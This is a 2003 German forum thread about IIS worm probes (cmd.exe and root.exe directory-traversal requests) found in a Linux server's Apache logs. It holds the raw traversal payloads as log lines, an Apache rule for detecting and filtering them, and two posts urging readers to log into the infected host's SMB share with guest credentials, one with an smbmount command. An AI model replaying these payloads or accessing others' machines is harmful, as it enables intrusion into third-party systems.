Page 1 of 1
Immer diese Ã?gypter
Posted: 2003-05-17 13:54
by stefan_w
Hallo
Seit ein paar Tagen ist mir in meinen Logs folgendes aufgefallen:
213.131.75.20 - - [15/May/2003:16:07:51 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
213.131.75.20 - - [15/May/2003:16:07:52 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
213.131.75.20 - - [15/May/2003:16:07:52 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
213.131.75.20 - - [15/May/2003:16:07:53 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
213.131.75.20 - - [15/May/2003:16:07:54 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
213.131.75.20 - - [15/May/2003:16:07:54 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
213.131.75.20 - - [15/May/2003:16:07:58 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
213.131.75.20 - - [15/May/2003:16:07:59 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
213.131.75.20 - - [15/May/2003:16:07:59 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
213.131.75.20 - - [15/May/2003:16:08:00 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
213.131.75.20 - - [15/May/2003:16:08:01 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
213.131.75.20 - - [15/May/2003:16:08:01 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
213.131.75.20 - - [15/May/2003:16:08:02 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
213.131.75.20 - - [15/May/2003:16:08:02 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
213.131.75.20 - - [15/May/2003:16:08:03 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
213.131.75.20 - - [15/May/2003:16:08:04 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
Nach Trace u.s.w. sitzt der Bursche in Ã?gypten. Wenn dies eine einmalige Geschichte gewesen wäre, dann hätte mich das nicht interessiert, aber er versucht immer wieder ob aus meiner Linux-Maschine nicht über Nacht ein Windows-Server geworden ist.
Nun leide ich nicht gerade unter Paranoia, aber meine anderen Server hängen sehr dicht an den einen dran und ich wollte mal von euch wissen, was man da eventuell machen könnte.
IP blocken?
Ã?gypten vom Server verbannen?
Einen Geistlichen bestellen um den Fluch des Pharaos zu entkommen?
mfg, Stefan
Re: Immer diese Ã?gypter
Posted: 2003-05-17 13:59
by kase
Das ist ein Windows Exploit, der inzwischen eher schon veraltet ist. Mit der Suchfunktion wirste dazu vermutlich auch noch was finden, wenn inzwischen nicht all diese Threads schon gelöscht wurden.
Da du vermutlich aber ein Linux Rootie hast völlig ungefährlich, diese Zeilen einfach überlesen :)
PS: Vor ein paar Wochen hatte man diese Zeilen noch täglich mehrfach in seinen Logs :)
Re: Immer diese Ã?gypter
Posted: 2003-05-17 14:04
by stefan_w
Ok, danke.
Ich hatte mich nur gewundert, warum der Dödel immer mit der gleichen IP kommt... :lol:
Re: Immer diese Ã?gypter
Posted: 2003-05-17 14:12
by captaincrunch
Auch in Ã?gypten gibt's feste IP's ... ;)
Mal ernsthaft : genau so gut kann das durch einen gecrackten Server hervorgerufen werden (CodeRed z.B.).
Das beste, was du machen kannst ist, den betreffenden abuse@ anzuschreiben, dass die der Sache auf den Grund gehen ...
Re: Immer diese Ã?gypter
Posted: 2003-05-17 14:15
by kase
auf ägyptisch ? *gggggggg*
Oder können die Englisch ? ^^
Ich würde die Meldungen einfach ignorieren, glaube kaum, dass wegen diesem Exploit die Abuse Abteilungen noch groß was auf die Beine stellen.
Re: Immer diese Ã?gypter
Posted: 2003-05-17 14:18
by stefan_w
CaptainCrunch wrote:Auch in Ã?gypten gibt's feste IP's ... ;)
Das mag ja sein. Aber wenn ich so etwas versuchen würde, dann muss ich doch ganz schön doof sein, das immer mit der gleichen IP auszuprobieren, oder? 8O
Ich werd mir das noch 1-2 Tage anschauen und ihn dann mal bei @abuse melden... mal schauen.
PS: Logfiles anzuschauen kann echt spannend sein.
Re: Immer diese Ã?gypter
Posted: 2003-05-17 15:18
by dodolin
Mensch Leute, das sind keine Exploits, das sind Würmer!
Würmer verbreiten sich selbsttätig weiter und es ist mit grösster Wahrscheinlichkeit davon auszugehen, dass derjenige noch gar nicht weiß, dass seine Kiste infiziert ist.
Nochmal in deutlich: DAS SIND KEINE BEWUSSTEN ANGRIFFSHANDLUNGEN!
PS: Ich würd mir deswegen nicht den Aufwand machen, abuse anzuschreiben. Einfach ignorieren. Aber ok, wer will, der "kann" das natürlich tun, ja.
PPS: Würde ich das bei jedem IIS-Würmchen machen wollen, könnte ich wohl 24h am Tag Abuse-Meldungen schreiben und käme immer noch nicht rum damit.
Re: Immer diese Ã?gypter
Posted: 2003-05-17 15:36
by [tom]
@dodolin:
Wir sollten ne neue Disziplin eröffnen: Synchronschreiben. ;-) Ist langsam schon auffällig, dass du immer meine Texte verwendest. :lol:
[TOM]
Re: Immer diese Ã?gypter
Posted: 2003-05-17 16:16
by lufthansen
macht mal wenn ihr win habt
\213.131.75.20
uns logt euch als gast:gast ein
:P
aber passt mit den eml's auf da is bestimmt nimda oder ähnliches drin
Re: Immer diese Ã?gypter
Posted: 2003-05-17 16:39
by sqrt
LuftHansen wrote:macht mal wenn ihr win habt
\213.131.75.20
uns logt euch als gast:gast ein
Warum muß man Win haben? Bei klappt auch ein
Code: Select all
smbmount //213.131.75.20/emule /mnt -o ip=213.131.75.20,username=gast,password=gast
wunderbar... :)
Re: Immer diese Ã?gypter
Posted: 2003-05-17 16:53
by oxygen
Für solche harten Fälle bevorzuge ich:
/usr/sbin/iptables -I INPUT -s 213.131.75.20 -j DROP
dann ist Ruhe.
Re: Immer diese Ã?gypter
Posted: 2003-05-17 18:09
by scythe42
øxygen wrote:Für solche harten Fälle bevorzuge ich:
/usr/sbin/iptables -I INPUT -s 213.131.75.20 -j DROP
dann ist Ruhe.
du weisst schon, dass DROP mehr Netzwerk-Last erzeugt als REJECT?
Bei DROP weiss der Client von nichts und schickt dir mit erhöhter Frequenz (so sehen es die RFCs vor) das Packet öfters, weil er denkt es ist verloren gegangen - bis das vordefinierte Timeout eintritt. Bei REJECT weiss der TCP/IP Stack Bescheid und das Packet wird nicht nochmal geschickt und ein Fehler zur Applikation hochgeschickt.
Ich spreche hier vom Packet auf unterer Stack Ebene und nicht wie oft eine Applikation was schickt...
So und nun wieder auf zu: Warum Packet Filtering auf nem Rootserver Blödsinn ist und mir bisheute noch keiner ein sinniges Beispiel für Packet Filtering auf dem Rootserver nennen konnte (IP Accounting ist KEIN Packet Filtering...)
Re: Immer diese Ã?gypter
Posted: 2003-05-17 20:51
by rootmaster
scythe42 wrote:
So und nun wieder auf zu: Warum Packet Filtering auf nem Rootserver Blödsinn ist und mir bisheute noch keiner ein sinniges Beispiel für Packet Filtering auf dem Rootserver nennen konnte (IP Accounting ist KEIN Packet Filtering...)
ohne eine erneute diskussion zu "entflamen", könnte folgendes grund sein:
unvollkommen resp. fehlerhaft implementierte tcp/ip-stack und hash tables zu schützen 8)
denn "gehärtete" application layer nützen zb. nichts, wenn attacks mit malformed/bogus paketen auf routing caches möglich sind.
eine studie, die diese art von attacks beleuchtet (und zb squid und assoziative arrays von perl (5.6.1,5.8.0) betrifft; btw. djbdns ist "immun" ;)) findet man hier:
http://www.cs.rice.edu/~scrosby/tr/HashAttack.pdf
We have presented algorithmic complexity attacks,
a new class of low-bandwidth denial of service
attacks. Where traditional DoS attacks focus on
small implementation bugs, such as buffer over-
flows, these attacks focus on inefficiencies in the
worst-case performance of algorithms used in many
mainstream applications.
und dass das alles keine graue theorie ist, zeigt ein sicherheitshinweis von letzter woche
http://rhn.redhat.com/errata/RHSA-2003-172.html
ergo wäre es nicht unsinnig, (prophylaktisch) einen packet-filter vorzuschalten ;)
ps: die logs lassen sich zb durch folgenden code im vhost "bereinigen"
Code: Select all
SetEnvIf Request_URI ((root|cmd).exe|default.ida)$ worm
#CustomLog /pfad/zu/apache/logs/worm_log common env=worm
CustomLog /pfad/zu/apache/logs/access_log common env=!worm
RedirectMatch permanent ((root|cmd).exe|default.ida)$ http://WORM_ALERT
"back to the roots"
Re: Immer diese Ã?gypter
Posted: 2003-05-18 00:04
by scythe42
...was nicht schadet brauch man auch nicht filtern... aber lassen wir die dikussion besser..
Dennoch: immer REJECT statt DROP nehmen....